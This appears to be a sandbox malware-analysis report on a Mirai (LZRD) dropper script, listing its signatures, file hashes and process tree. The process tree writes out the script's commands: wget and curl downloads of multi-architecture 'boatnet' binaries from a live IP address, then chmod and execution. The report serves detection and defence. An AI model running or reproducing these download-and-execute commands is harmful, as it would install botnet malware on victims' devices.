Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    42s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    11/03/2025, 08:32

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    37b42f54fe3c72cb1eb5543a6c17f546

  • SHA1

    637b619c1d425218ed7ec1ae064fc85196423c45

  • SHA256

    ab63171a0b3118f9a223b6f0cf23303cdd2aafcbdff1e8024e9728a91f99ae8d

  • SHA512

    e201190305d13d12894dfe7c8cd9f0c5022ebbd3af2d573f64433f676c1b22131f1abecc9f85bce3b453de6661a10291595318d15f025465360fa52c78089f8a

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 15 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 15 IoCs
  • Modifies Watchdog functionality 1 TTPs 4 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 4 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks CPU configuration 1 TTPs 15 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 27 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:648
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:650
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:667
    • /bin/cat
      cat boatnet.x86
      2⤵
        PID:675
      • /bin/chmod
        chmod +x boatnet.x86 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
        2⤵
        • File and Directory Permissions Modification
        PID:677
      • /tmp/WTF
        ./WTF
        2⤵
          PID:679
        • /usr/bin/wget
          wget http://107.172.82.193/hiddenbin/boatnet.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:682
        • /usr/bin/curl
          curl -O http://107.172.82.193/hiddenbin/boatnet.mips
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:685
        • /bin/cat
          cat boatnet.mips
          2⤵
          • System Network Configuration Discovery
          PID:686
        • /bin/chmod
          chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
          2⤵
          • File and Directory Permissions Modification
          PID:687
        • /tmp/WTF
          ./WTF
          2⤵
            PID:688
          • /usr/bin/wget
            wget http://107.172.82.193/hiddenbin/boatnet.arc
            2⤵
              PID:690
            • /usr/bin/curl
              curl -O http://107.172.82.193/hiddenbin/boatnet.arc
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              • Writes file to tmp directory
              PID:691
            • /bin/cat
              cat boatnet.arc
              2⤵
                PID:694
              • /bin/chmod
                chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
                2⤵
                • File and Directory Permissions Modification
                PID:696
              • /tmp/WTF
                ./WTF
                2⤵
                  PID:698
                • /usr/bin/wget
                  wget http://107.172.82.193/hiddenbin/boatnet.i468
                  2⤵
                    PID:699
                  • /usr/bin/curl
                    curl -O http://107.172.82.193/hiddenbin/boatnet.i468
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:703
                  • /bin/cat
                    cat boatnet.i468
                    2⤵
                      PID:709
                    • /bin/chmod
                      chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
                      2⤵
                      • File and Directory Permissions Modification
                      PID:710
                    • /tmp/WTF
                      ./WTF
                      2⤵
                        PID:711
                      • /usr/bin/wget
                        wget http://107.172.82.193/hiddenbin/boatnet.i686
                        2⤵
                          PID:712
                        • /usr/bin/curl
                          curl -O http://107.172.82.193/hiddenbin/boatnet.i686
                          2⤵
                          • Checks CPU configuration
                          • Reads runtime system information
                          • Writes file to tmp directory
                          PID:717
                        • /bin/cat
                          cat boatnet.i686
                          2⤵
                            PID:729
                          • /bin/chmod
                            chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
                            2⤵
                            • File and Directory Permissions Modification
                            PID:730
                          • /tmp/WTF
                            ./WTF
                            2⤵
                              PID:731
                            • /usr/bin/wget
                              wget http://107.172.82.193/hiddenbin/boatnet.x86_64
                              2⤵
                                PID:733
                              • /usr/bin/curl
                                curl -O http://107.172.82.193/hiddenbin/boatnet.x86_64
                                2⤵
                                • Checks CPU configuration
                                • Reads runtime system information
                                • Writes file to tmp directory
                                PID:737
                              • /bin/cat
                                cat boatnet.x86_64
                                2⤵
                                  PID:745
                                • /bin/chmod
                                  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:746
                                • /tmp/WTF
                                  ./WTF
                                  2⤵
                                    PID:747
                                  • /usr/bin/wget
                                    wget http://107.172.82.193/hiddenbin/boatnet.mpsl
                                    2⤵
                                    • Writes file to tmp directory
                                    PID:749
                                  • /usr/bin/curl
                                    curl -O http://107.172.82.193/hiddenbin/boatnet.mpsl
                                    2⤵
                                    • Checks CPU configuration
                                    • Reads runtime system information
                                    • Writes file to tmp directory
                                    PID:757
                                  • /bin/cat
                                    cat boatnet.mpsl
                                    2⤵
                                      PID:759
                                    • /bin/chmod
                                      chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:760
                                    • /tmp/WTF
                                      ./WTF
                                      2⤵
                                        PID:761
                                      • /usr/bin/wget
                                        wget http://107.172.82.193/hiddenbin/boatnet.arm
                                        2⤵
                                        • Writes file to tmp directory
                                        PID:763
                                      • /usr/bin/curl
                                        curl -O http://107.172.82.193/hiddenbin/boatnet.arm
                                        2⤵
                                        • Checks CPU configuration
                                        • Reads runtime system information
                                        • Writes file to tmp directory
                                        PID:764
                                      • /bin/cat
                                        cat boatnet.arm
                                        2⤵
                                          PID:768
                                        • /bin/chmod
                                          chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:770
                                        • /tmp/WTF
                                          ./WTF
                                          2⤵
                                          • Modifies Watchdog functionality
                                          • Writes file to system bin folder
                                          • Reads runtime system information
                                          PID:771
                                        • /usr/bin/wget
                                          wget http://107.172.82.193/hiddenbin/boatnet.arm5
                                          2⤵
                                          • Writes file to tmp directory
                                          PID:775
                                        • /usr/bin/curl
                                          curl -O http://107.172.82.193/hiddenbin/boatnet.arm5
                                          2⤵
                                          • Checks CPU configuration
                                          • Writes file to tmp directory
                                          PID:781
                                        • /bin/cat
                                          cat boatnet.arm5
                                          2⤵
                                            PID:787
                                          • /bin/chmod
                                            chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:789
                                          • /tmp/WTF
                                            ./WTF
                                            2⤵
                                              PID:791
                                            • /usr/bin/wget
                                              wget http://107.172.82.193/hiddenbin/boatnet.arm6
                                              2⤵
                                              • Writes file to tmp directory
                                              PID:792
                                            • /usr/bin/curl
                                              curl -O http://107.172.82.193/hiddenbin/boatnet.arm6
                                              2⤵
                                              • Checks CPU configuration
                                              • Reads runtime system information
                                              • Writes file to tmp directory
                                              PID:798
                                            • /bin/cat
                                              cat boatnet.arm6
                                              2⤵
                                                PID:804
                                              • /bin/chmod
                                                chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
                                                2⤵
                                                • File and Directory Permissions Modification
                                                PID:805
                                              • /tmp/WTF
                                                ./WTF
                                                2⤵
                                                • Reads runtime system information
                                                PID:807
                                              • /usr/bin/wget
                                                wget http://107.172.82.193/hiddenbin/boatnet.arm7
                                                2⤵
                                                • Writes file to tmp directory
                                                PID:809
                                              • /usr/bin/curl
                                                curl -O http://107.172.82.193/hiddenbin/boatnet.arm7
                                                2⤵
                                                • Checks CPU configuration
                                                • Writes file to tmp directory
                                                PID:812
                                              • /bin/cat
                                                cat boatnet.arm7
                                                2⤵
                                                  PID:816
                                                • /bin/chmod
                                                  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
                                                  2⤵
                                                  • File and Directory Permissions Modification
                                                  PID:817
                                                • /tmp/WTF
                                                  ./WTF
                                                  2⤵
                                                  • Modifies Watchdog functionality
                                                  • Writes file to system bin folder
                                                  • Reads runtime system information
                                                  PID:818
                                                • /usr/bin/wget
                                                  wget http://107.172.82.193/hiddenbin/boatnet.ppc
                                                  2⤵
                                                  • Writes file to tmp directory
                                                  PID:822
                                                • /usr/bin/curl
                                                  curl -O http://107.172.82.193/hiddenbin/boatnet.ppc
                                                  2⤵
                                                  • Checks CPU configuration
                                                  • Reads runtime system information
                                                  • Writes file to tmp directory
                                                  PID:823
                                                • /bin/cat
                                                  cat boatnet.ppc
                                                  2⤵
                                                    PID:824
                                                  • /bin/chmod
                                                    chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
                                                    2⤵
                                                    • File and Directory Permissions Modification
                                                    PID:825
                                                  • /tmp/WTF
                                                    ./WTF
                                                    2⤵
                                                      PID:826
                                                    • /usr/bin/wget
                                                      wget http://107.172.82.193/hiddenbin/boatnet.spc
                                                      2⤵
                                                      • Writes file to tmp directory
                                                      PID:828
                                                    • /usr/bin/curl
                                                      curl -O http://107.172.82.193/hiddenbin/boatnet.spc
                                                      2⤵
                                                      • Checks CPU configuration
                                                      • Writes file to tmp directory
                                                      PID:830
                                                    • /bin/cat
                                                      cat boatnet.spc
                                                      2⤵
                                                        PID:832
                                                      • /bin/chmod
                                                        chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
                                                        2⤵
                                                        • File and Directory Permissions Modification
                                                        PID:833
                                                      • /tmp/WTF
                                                        ./WTF
                                                        2⤵
                                                          PID:834
                                                        • /usr/bin/wget
                                                          wget http://107.172.82.193/hiddenbin/boatnet.m68k
                                                          2⤵
                                                          • Writes file to tmp directory
                                                          PID:836
                                                        • /usr/bin/curl
                                                          curl -O http://107.172.82.193/hiddenbin/boatnet.m68k
                                                          2⤵
                                                          • Checks CPU configuration
                                                          • Reads runtime system information
                                                          • Writes file to tmp directory
                                                          PID:837
                                                        • /bin/cat
                                                          cat boatnet.m68k
                                                          2⤵
                                                            PID:838
                                                          • /bin/chmod
                                                            chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
                                                            2⤵
                                                            • File and Directory Permissions Modification
                                                            PID:839
                                                          • /tmp/WTF
                                                            ./WTF
                                                            2⤵
                                                              PID:840
                                                            • /usr/bin/wget
                                                              wget http://107.172.82.193/hiddenbin/boatnet.sh4
                                                              2⤵
                                                              • Writes file to tmp directory
                                                              PID:842
                                                            • /usr/bin/curl
                                                              curl -O http://107.172.82.193/hiddenbin/boatnet.sh4
                                                              2⤵
                                                              • Checks CPU configuration
                                                              • Reads runtime system information
                                                              • Writes file to tmp directory
                                                              PID:843
                                                            • /bin/cat
                                                              cat boatnet.sh4
                                                              2⤵
                                                                PID:844
                                                              • /bin/chmod
                                                                chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
                                                                2⤵
                                                                • File and Directory Permissions Modification
                                                                PID:845
                                                              • /tmp/WTF
                                                                ./WTF
                                                                2⤵
                                                                  PID:846

                                                              Network

                                                              MITRE ATT&CK Enterprise v15

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • /tmp/WTF

                                                                Filesize

                                                                23KB

                                                                MD5

                                                                6e0d03239183153de8b328368eec14c0

                                                                SHA1

                                                                d4436c25ca650862b1d626bc735d621720c850c3

                                                                SHA256

                                                                c28c0adf305d4225c9d21fa9c254519a07e24d4411b42b99c85d882be65a0d1b

                                                                SHA512

                                                                e96bfb589fa14c9b373d12765b52d17d8f505ee2e55d26bae4067a0d738d89e4e5490927060f8331569c7df4943719fb12e4c36b464eb3c9496abdd8da80edcd

                                                              • /tmp/WTF

                                                                Filesize

                                                                162B

                                                                MD5

                                                                1b7c22a214949975556626d7217e9a39

                                                                SHA1

                                                                d01c97e2944166ed23e47e4a62ff471ab8fa031f

                                                                SHA256

                                                                340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87

                                                                SHA512

                                                                ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

                                                              • /tmp/WTF

                                                                Filesize

                                                                57KB

                                                                MD5

                                                                d55ad7ddc6b166522c3225839df619c3

                                                                SHA1

                                                                bb4c61e25abce482514e76907840605cf1abbbf8

                                                                SHA256

                                                                6c73b9ee290ffc3d5671821ea05d67ca012b3617a432107dbfe8fab0f1b6d7c7

                                                                SHA512

                                                                94508665c042fae60ce9e21b262f120c7f5b19a92e55c497408c0d71f4a51718315465070bffec2e9293a73b99734a3c7bdbbedce33d80a8cca667e939170916

                                                              • /tmp/boatnet.x86

                                                                Filesize

                                                                20KB

                                                                MD5

                                                                681dd964889eddd4cfdc230ba745767b

                                                                SHA1

                                                                bdb24c1844bc8285e2bf781613149f6db7b4928d

                                                                SHA256

                                                                fca185b5efc7e5df44003d8612f179414eadb71c31386c707a7e6f1f8809790e

                                                                SHA512

                                                                ac2556dd6bf5c1fde0c0eea5c78037274065cbb5231969d572c8df8dafe3740c49d2c681d21e3abc0f786f1c617162af4c955543f28fe1462dbd196565c655a4